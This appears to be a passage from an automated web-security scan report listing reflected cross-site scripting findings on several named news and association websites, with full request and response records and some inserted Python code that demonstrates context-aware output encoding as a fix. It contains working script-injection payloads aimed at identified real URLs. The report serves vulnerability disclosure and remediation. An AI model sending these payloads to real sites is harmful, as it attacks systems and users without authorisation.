User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:22 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:22 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=1AZLJL3JQ5RENQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32549
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/newsdf1dc'-alert(1)-'74b563b67f7/software/showArticle;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=496565813;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9482c"><script>alert(1)</script>c74652cf427 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news9482c"><script>alert(1)</script>c74652cf427/software/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:21 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:21 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=D4OPXK1R0SWNJQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32659
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=/news9482c"><script>alert(1)</script>c74652cf427/software/s;kvarticleid=;kvauthor=;loc=300;grp=875003964" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6550a"><script>alert(1)</script>1f904487184 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software6550a"><script>alert(1)</script>1f904487184/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:23 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:23 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=ZMGKRGBS1LZLFQE1GHRSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32180
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/software6550a"><script>alert(1)</script>1f904487184/s;kvarticleid=;kvauthor=;loc=300;grp=294957389" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62210'-alert(1)-'bab95806b75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software62210'-alert(1)-'bab95806b75/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:24 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:24 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=5KMGLVA4Y0M4LQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32070
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/software62210'-alert(1)-'bab95806b75/showArticle;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=724721911;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of the articleID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9ff5"><script>alert(1)</script>27a16567aaa was submitted in the articleID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software/showArticle.jhtml?articleID=225700879f9ff5"><script>alert(1)</script>27a16567aaa HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:33 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:33 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=HMZ4JHAJE5NQJQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33766
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <link rel="canonical" href="http://www.informationweek.com/news/software/showArticle.jhtml?articleID=225700879f9ff5"><script>alert(1)</script>27a16567aaa"/> ...[SNIP]...
The value of the articleID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7268'%3balert(1)//bcbcc08f31c was submitted in the articleID parameter. This input was echoed as d7268';alert(1)//bcbcc08f31c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/showArticle.jhtml?articleID=225700879d7268'%3balert(1)//bcbcc08f31c HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:35 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:35 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=I3SROGCOXOGRVQE1GHRSKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 33353
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Software_HP_Welcome_Ad_1x1;key=225700879d7268';alert(1)//bcbcc08f31c+/news/software/showArticle/dhandler;kvarticleid=225700879d7268';alert(1)//bcbcc08f31c;kvauthor=;loc=100;target=_blank;grp=534116439;misc='+new Date().getTime()+'"> ...[SNIP]...
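As an added illustration of the remediation advice for the script-context findings above (this is example code, not part of the scanner report or of the site's own code), the following Python models the two reflection points seen in this finding, the canonical <link> attribute and the ad tag that is written from a single-quoted JS string, against a hypothetical template with made-up hostnames. The payloads are the ones from the report; the template text, hostnames and helper names are assumptions. It shows why the script-context case must encode the value for the inner HTML attribute first and then for the JS string literal, and checks with a browser-like parser that the encoded value reaches the attribute unchanged.

```python
import html
import re
from html.parser import HTMLParser

# Payloads copied from the articleID findings above; the two templates are a
# simplified, hypothetical stand-in for the reflection points seen in the
# responses (canonical <link> and the ad tag written from a JS string).
ATTR_PAYLOAD = '225700879f9ff5"><script>alert(1)</script>27a16567aaa'
JS_PAYLOAD = "225700879d7268';alert(1)//bcbcc08f31c"
CANONICAL_TEMPLATE = ('<link rel="canonical" '
                      'href="http://news.example.test/showArticle.jhtml?articleID={value}"/>')
AD_TAG_TEMPLATE = ("document.write('<scr'+'ipt src=\"http://ads.example.test/ADTECH;"
                   "key={value};misc='+new Date().getTime()+'\"></scr'+'ipt>');")


def no_encoding(value):
    """What the vulnerable pages do: copy the value straight into the template."""
    return value


def encode_html_attr(value):
    """Double-quoted HTML attribute context: & < > " ' become entities."""
    return html.escape(value, quote=True)


def encode_js_string(value):
    """JS string-literal context: everything but ASCII letters and digits becomes
    \\xHH or \\uHHHH, so the value can never close the literal, start a // comment
    or contain a literal </script>."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def nested_encode(value):
    """The ad tag puts the value in an HTML attribute *inside* a JS string, so it
    is encoded for the innermost context first (attribute), then the outer (JS)."""
    return encode_js_string(encode_html_attr(value))


def decode_js_string(literal_body):
    """What the JS engine does with \\xHH / \\uHHHH (used for the round-trip check)."""
    return re.sub(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), literal_body)


def render_canonical(article_id, encode):
    return CANONICAL_TEMPLATE.format(value=encode(article_id))


def render_ad_tag(article_id, encode):
    return AD_TAG_TEMPLATE.format(value=encode(article_id))


class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def start_tags(markup):
    """Tags a browser would create from the markup (attribute values entity-decoded)."""
    p = _Tags()
    p.feed(markup)
    p.close()
    return p.tags


def js_outside_string_literals(src):
    """Drop the bodies of single-quoted JS string literals (honouring backslash
    escapes) and return what is left: that is the code the engine would execute."""
    out, in_str, i = [], False, 0
    while i < len(src):
        ch = src[i]
        if in_str and ch == "\\":
            i += 1                      # skip the escaped character
        elif ch == "'":
            in_str = not in_str
            out.append(ch)
        elif not in_str:
            out.append(ch)
        i += 1
    return "".join(out)


def survives_browser_decoding(value):
    """JS-decode, then HTML-decode: the browser applies the same two steps, so the
    nested encoding must hand the original value back unchanged."""
    return html.unescape(decode_js_string(nested_encode(value))) == value


if __name__ == "__main__":
    print(render_canonical(ATTR_PAYLOAD, encode_html_attr))
    print(render_ad_tag(JS_PAYLOAD, nested_encode))
```

The `js_outside_string_literals` check is a minimal tokenizer, not a JS parser; it is enough to show that with the raw value the `;alert(1)//` lands outside the string literal, and with the nested encoding nothing but the template's own code remains. The order of the two encoders matters: JS-encoding alone would produce a value that, once document.write() parses it, still terminates the src attribute.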
1.80. http://www.informationweek.com/news/software/showArticle.jhtml [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.informationweek.com
Path:
/news/software/showArticle.jhtml
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6df8"><script>alert(1)</script>82ef9697c7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/software/showArticle.jhtml?articleID=225700879&f6df8"><script>alert(1)</script>82ef9697c7c=1 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:15:36 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 11 Dec 2010 02:15:36 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=KSVOKGDGW15ZBQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 80199
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... <input type="hidden" value="/news/software/showArticle.jhtml?articleID=225700879&f6df8"><script>alert(1)</script>82ef9697c7c=1#comments" name="/cmp/shared/apps/jive/community/PostCommentFormHandler.postCommentSuccessURL" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b37c"><script>alert(1)</script>3d935b0d726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article8b37c"><script>alert(1)</script>3d935b0d726/08/02/25/E-scammers-trashing-reputations_1.html HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Sat, 11 Dec 2010 02:15:40 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292033740-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48543
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f6ea"><script>alert(1)</script>e1fee3bb966 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/083f6ea"><script>alert(1)</script>e1fee3bb966/02/25/E-scammers-trashing-reputations_1.html HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Sat, 11 Dec 2010 02:15:44 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292033744-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48543
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd7fa"><script>alert(1)</script>7ac2162aa3f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/08/02dd7fa"><script>alert(1)</script>7ac2162aa3f/25/E-scammers-trashing-reputations_1.html HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Sat, 11 Dec 2010 02:15:47 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292033747-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48543
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d436"><script>alert(1)</script>67ecd26807e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/08/02/251d436"><script>alert(1)</script>67ecd26807e/E-scammers-trashing-reputations_1.html HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Sat, 11 Dec 2010 02:15:50 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292033750-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48543
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9def9"><script>alert(1)</script>a4a42968d56 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /article/08/02/25/E-scammers-trashing-reputations_1.html9def9"><script>alert(1)</script>a4a42968d56 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:15:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Sat, 11 Dec 2010 02:15:53 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292033753-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48543
The value of the Itemid request parameter is copied into an HTML comment. The payload acefe-->0ea91af9119 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=1543&Itemid=67acefe-->0ea91af9119&getcontent=2 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the catid request parameter is copied into an HTML comment. The payload 5aa90-->e4cb2f60c85 was submitted in the catid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=115aa90-->e4cb2f60c85&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the catid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b30"%20style%3dx%3aexpression(alert(1))%201124fec0b65 was submitted in the catid parameter. This input was echoed as 49b30\" style=x:expression(alert(1)) 1124fec0b65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=1149b30"%20style%3dx%3aexpression(alert(1))%201124fec0b65&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the getcontent request parameter is copied into an HTML comment. The payload 7dcdc-->18ba3115fa6 was submitted in the getcontent parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=1543&Itemid=67&getcontent=27dcdc-->18ba3115fa6 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the id request parameter is copied into an HTML comment. The payload 1a427-->1f145170a99 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=15441a427-->1f145170a99&catid=11&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.91. http://www.inta.org/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.inta.org
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4ae9a--><a>d46878f478e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=1543&Itemid=67&getcontent=2&4ae9a--><a>d46878f478e=1 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the parentid request parameter is copied into an HTML comment. The payload 9ac59-->1e701364a4f was submitted in the parentid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetails&id=1544&catid=11&parentid=15439ac59-->1e701364a4f&Itemid=67&getcontent=2 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the task request parameter is copied into an HTML comment. The payload c2255-->07a7855964b was submitted in the task parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php?option=com_intaevents&task=eventdetailsc2255-->07a7855964b&id=1544&catid=11&parentid=1543&Itemid=67&getcontent=2 HTTP/1.1
Host: www.inta.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
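As an added illustration of the HTML-comment remediation that recurs through the inta.org findings above (example code, not part of the scanner report or of the site's own code), the following Python renders two of the report's payloads into a hypothetical template that records a request parameter inside a comment, and uses a browser-like parser to show what escapes: with the raw value the comment ends at the injected `-->`, the rest of the payload becomes visible text, and the `<a>` variant creates a live tag. Entity references are never decoded inside a comment, so ordinary HTML encoding does not help; the encoder here instead guarantees the output never contains `--`, `<` or `>`. The template text and helper names are assumptions.

```python
from html.parser import HTMLParser

# Payloads copied from the inta.org findings above; the template is a hypothetical
# stand-in for a page that records request parameters in an HTML comment.
CLOSE_COMMENT_PAYLOAD = "eventdetailsc2255-->07a7855964b"
INJECT_TAG_PAYLOAD = "4ae9a--><a>d46878f478e"
TEMPLATE = '<!-- com_intaevents: task={task} -->\n<div class="event">event body</div>'


def no_encoding(value):
    """What the vulnerable page does: copy the value straight into the comment."""
    return value


def encode_for_comment(value):
    """Entity references are never decoded inside a comment, so plain HTML encoding
    cannot hide '-->'. Instead make sure the output can never contain '--', '>' or
    '<', which are the only characters that can end the comment or open a tag."""
    return value.replace("-", "&#45;").replace("<", "&lt;").replace(">", "&gt;")


def render(task, encode):
    return TEMPLATE.format(task=encode(task))


class _Audit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.comments, self.tags, self.text = [], [], []

    def handle_comment(self, data):
        self.comments.append(data)

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def parse(markup):
    """What a browser would build: comments (inert), start tags (live), visible text."""
    p = _Audit()
    p.feed(markup)
    p.close()
    return {"comments": p.comments, "tags": p.tags, "text": p.text}


def comment_contains_payload(markup, payload_fragment):
    """True when the payload is still entirely inside the one comment and the
    document otherwise looks exactly like the untouched template."""
    result = parse(markup)
    return (len(result["comments"]) == 1
            and payload_fragment in result["comments"][0]
            and result["tags"] == ["div"]
            and result["text"] == ["event body"])


if __name__ == "__main__":
    for payload in (CLOSE_COMMENT_PAYLOAD, INJECT_TAG_PAYLOAD):
        print("raw:    ", parse(render(payload, no_encoding)))
        print("encoded:", parse(render(payload, encode_for_comment)))
```

The encoded comment still shows the payload (as `&#45;&#45;&gt;`), which is acceptable for a debugging comment but is a reminder that the better fix, as the report says, is not to echo the value there at all; a value that is also reflected elsewhere on the page needs the encoder for that other context, not this one.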
1.94. http://www.internetevolution.com/author.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.internetevolution.com
Path:
/author.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22722"><script>alert(1)</script>c870c6a6705 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
